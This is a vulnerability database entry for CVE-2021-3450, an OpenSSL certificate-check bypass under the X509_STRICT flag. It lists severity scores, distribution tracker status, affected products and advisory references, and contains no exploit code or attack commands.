CVE-2021-3450 | CA certificate check bypass with X509_V_FLAG_X509_STRICT

The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).

Published: 2021-03-25 Last update: 2024-11-21 Assigner: [email protected] Source: [email protected]
NVD Status:ModifiedCVE State: published
View at NVD, CVE.org, EUVD

CVE-2021-3450 is rated Moderate Risk (52.7/100): CVSS High severity, with medium exploitation likelihood (EPSS 0.50%). Review affected assets and schedule remediation.

Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.

Exploit prediction scoring system (EPSS) score for CVE-2021-3450

EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).

# Date Old EPSS score New EPSS score Delta (New - Old)
1 2026-03-16 0.42% 0.50% +0.09%
2 2026-02-18 0.50% 0.42% -0.09%
3 2026-01-05 0.50%

Full EPSS history (44 records total)

Common vulnerability scoring system (CVSS) metrics for CVE-2021-3450

CVSS metrics for this CVE.

Base score Version Severity Vector Exploitability Impact Score source
7.4 3.1 HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:H)
Even with access, the exploit needs extra luck, timing, or a fussy environment to actually work.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:N)
Service keeps running; no real outage angle.
 2.2 5.2 [email protected]
5.8 2.0 MEDIUM
AV:N/AC:M/Au:N/C:P/I:P/A:N Click to expand
Access vector (AV:N)
Can be exploited remotely over network reachability.
Access complexity (AC:M)
Exploitation needs some favorable conditions, but not exceptional ones.
Authentication (AU:N)
No authentication is required.
Confidentiality impact (C:P)
Partial confidentiality impact.
Integrity impact (I:P)
Partial integrity impact.
Availability impact (A:N)
No availability impact.
 8.6 4.9 [email protected]

Weakness enumeration for CVE-2021-3450

GitHub Security Advisory for CVE-2021-3450

GHSA-8hfj-xrj2-pm22 · Severity: high · Ecosystem: rust — Certificate check bypass in openssl-src

OS Trackers for CVE-2021-3450

vendor priority summary link
alpine high CVE-2021-3450: 3 source package rows (openssl, openssl1.1-compat, openssl3); 25 state rows across 13 repos (3.10-main, 3.11-main, 3.12-main, 3.17-community, 3.17-main, 3.18-community, 3.18-main, 3.19-main, 3.20-main, 3.21-main, 3.22-main, edge-community, edge-main); fixed 15, open 10. https://security.alpinelinux.org/vuln/CVE-2021-3450
debian not yet assigned CVE-2021-3450 not yet assigned priority: Debian including 1 source packages (openssl), 5 status rows across 5 suites (bookworm, bullseye, forky, sid, trixie): resolved 5. https://security-tracker.debian.org/tracker/CVE-2021-3450
gentoo normal CVE-2021-3450: 1 GLSA(s) (202103-03), 1 atom(s) (dev-libs/openssl); latest impact normal. https://bugs.gentoo.org/buglist.cgi?quicksearch=CVE-2021-3450
redhat high https://access.redhat.com/security/cve/CVE-2021-3450
suse high CVE-2021-3450 severity important: SUSE including 92 source package names (12:nodejs12-12.22.2-4.16.1, 12:npm12-12.22.2-4.16.1, …), 586 product×package rows across 84 product lines (Container bci/node, HPE Helion OpenStack 8, … (84 product lines)): Known Not Affected 414, Fixed 172. https://www.suse.com/security/cve/CVE-2021-3450/
ubuntu high CVE-2021-3450 high priority: Ubuntu including 4 source packages (edk2, nodejs, openssl, openssl1.0), 24 status rows across 6 suites (bionic, focal, groovy, trusty, upstream, xenial): not-affected 16, DNE 5, needs-triage 3. https://ubuntu.com/security/CVE-2021-3450

Affected software / configurations for CVE-2021-3450

Vendor Product Version Raw CPE
openssl openssl >= 1.1.1h, < 1.1.1k cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*
freebsd freebsd 12.2 cpe:2.3:o:freebsd:freebsd:12.2:-:*:*:*:*:*:*
freebsd freebsd 12.2 cpe:2.3:o:freebsd:freebsd:12.2:p1:*:*:*:*:*:*
freebsd freebsd 12.2 cpe:2.3:o:freebsd:freebsd:12.2:p2:*:*:*:*:*:*
netapp santricity_smi-s_provider_firmware cpe:2.3:o:netapp:santricity_smi-s_provider_firmware:-:*:*:*:*:*:*:*
netapp storagegrid_firmware cpe:2.3:o:netapp:storagegrid_firmware:-:*:*:*:*:*:*:*
windriver linux cpe:2.3:o:windriver:linux:-:*:*:*:cd:*:*:*
windriver linux 17.0 cpe:2.3:o:windriver:linux:17.0:*:*:*:lts:*:*:*
windriver linux 18.0 cpe:2.3:o:windriver:linux:18.0:*:*:*:lts:*:*:*
windriver linux 19.0 cpe:2.3:o:windriver:linux:19.0:*:*:*:lts:*:*:*
netapp cloud_volumes_ontap_mediator cpe:2.3:a:netapp:cloud_volumes_ontap_mediator:-:*:*:*:*:*:*:*
netapp oncommand_workflow_automation cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*
netapp ontap_select_deploy_administration_utility cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*
netapp storagegrid cpe:2.3:a:netapp:storagegrid:-:*:*:*:*:*:*:*
fedoraproject fedora 34 cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
tenable nessus <= 8.13.1 cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*
tenable nessus_agent >= 8.2.1, <= 8.2.3 cpe:2.3:a:tenable:nessus_agent:*:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.11.0 cpe:2.3:a:tenable:nessus_network_monitor:5.11.0:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.11.1 cpe:2.3:a:tenable:nessus_network_monitor:5.11.1:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.12.0 cpe:2.3:a:tenable:nessus_network_monitor:5.12.0:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.12.1 cpe:2.3:a:tenable:nessus_network_monitor:5.12.1:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.13.0 cpe:2.3:a:tenable:nessus_network_monitor:5.13.0:*:*:*:*:*:*:*
oracle commerce_guided_search 11.3.2 cpe:2.3:a:oracle:commerce_guided_search:11.3.2:*:*:*:*:*:*:*
oracle enterprise_manager_for_storage_management 13.4.0.0 cpe:2.3:a:oracle:enterprise_manager_for_storage_management:13.4.0.0:*:*:*:*:*:*:*
oracle graalvm 19.3.5 cpe:2.3:a:oracle:graalvm:19.3.5:*:*:*:enterprise:*:*:*
oracle graalvm 20.3.1.2 cpe:2.3:a:oracle:graalvm:20.3.1.2:*:*:*:enterprise:*:*:*
oracle graalvm 21.0.0.2 cpe:2.3:a:oracle:graalvm:21.0.0.2:*:*:*:enterprise:*:*:*
oracle jd_edwards_enterpriseone_tools < 9.2.6.0 cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
oracle jd_edwards_world_security a9.4 cpe:2.3:a:oracle:jd_edwards_world_security:a9.4:*:*:*:*:*:*:*
oracle mysql_connectors <= 8.0.23 cpe:2.3:a:oracle:mysql_connectors:*:*:*:*:*:*:*:*
oracle mysql_enterprise_monitor <= 8.0.23 cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*
oracle mysql_server <= 5.7.33 cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*
oracle mysql_server >= 8.0.15, <= 8.0.23 cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*
oracle mysql_workbench <= 8.0.23 cpe:2.3:a:oracle:mysql_workbench:*:*:*:*:*:*:*:*
oracle peoplesoft_enterprise_peopletools >= 8.57, <= 8.59 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*
oracle secure_backup < 18.1.0.1.0 cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
oracle secure_global_desktop 5.6 cpe:2.3:a:oracle:secure_global_desktop:5.6:*:*:*:*:*:*:*
oracle weblogic_server 12.2.1.4.0 cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
oracle weblogic_server 14.1.1.0.0 cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*
mcafee web_gateway 8.2.19 cpe:2.3:a:mcafee:web_gateway:8.2.19:*:*:*:*:*:*:*
mcafee web_gateway 9.2.10 cpe:2.3:a:mcafee:web_gateway:9.2.10:*:*:*:*:*:*:*
mcafee web_gateway 10.1.1 cpe:2.3:a:mcafee:web_gateway:10.1.1:*:*:*:*:*:*:*
mcafee web_gateway_cloud_service 8.2.19 cpe:2.3:a:mcafee:web_gateway_cloud_service:8.2.19:*:*:*:*:*:*:*
mcafee web_gateway_cloud_service 9.2.10 cpe:2.3:a:mcafee:web_gateway_cloud_service:9.2.10:*:*:*:*:*:*:*
mcafee web_gateway_cloud_service 10.1.1 cpe:2.3:a:mcafee:web_gateway_cloud_service:10.1.1:*:*:*:*:*:*:*
sonicwall sma100_firmware < 10.2.1.0-17sv cpe:2.3:o:sonicwall:sma100_firmware:*:*:*:*:*:*:*:*
sonicwall capture_client < 3.6.24 cpe:2.3:a:sonicwall:capture_client:*:*:*:*:*:*:*:*
sonicwall email_security < 10.0.11 cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*
sonicwall sonicos <= 7.0.1-r1456 cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
nodejs node.js >= 10.0.0, < 10.24.1 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*
nodejs node.js >= 12.0.0, < 12.22.1 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*
nodejs node.js >= 14.0.0, < 14.16.1 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*
nodejs node.js >= 15.0.0, < 15.14.0 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*

References for CVE-2021-3450

URL Tags
http://www.openwall.com/lists/oss-security/2021/03/27/1 Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/03/27/2 Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/03/28/3 Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/03/28/4 Mailing List Third Party Advisory
https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf Third Party Advisory
https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845 Third Party Advisory
https://kc.mcafee.com/corporate/index?page=content&id=SB10356 Third Party Advisory
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/
https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html Mailing List Vendor Advisory
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013 Third Party Advisory
https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc Third Party Advisory
https://security.gentoo.org/glsa/202103-03 Third Party Advisory
https://security.netapp.com/advisory/ntap-20210326-0006/ Third Party Advisory
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd Third Party Advisory
https://www.openssl.org/news/secadv/20210325.txt Vendor Advisory
https://www.oracle.com//security-alerts/cpujul2021.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpuApr2021.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpuapr2022.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpujul2022.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpuoct2021.html Patch Third Party Advisory
https://www.tenable.com/security/tns-2021-05 Third Party Advisory
https://www.tenable.com/security/tns-2021-08 Third Party Advisory
https://www.tenable.com/security/tns-2021-09 Third Party Advisory
cvelogic Threat Intelligence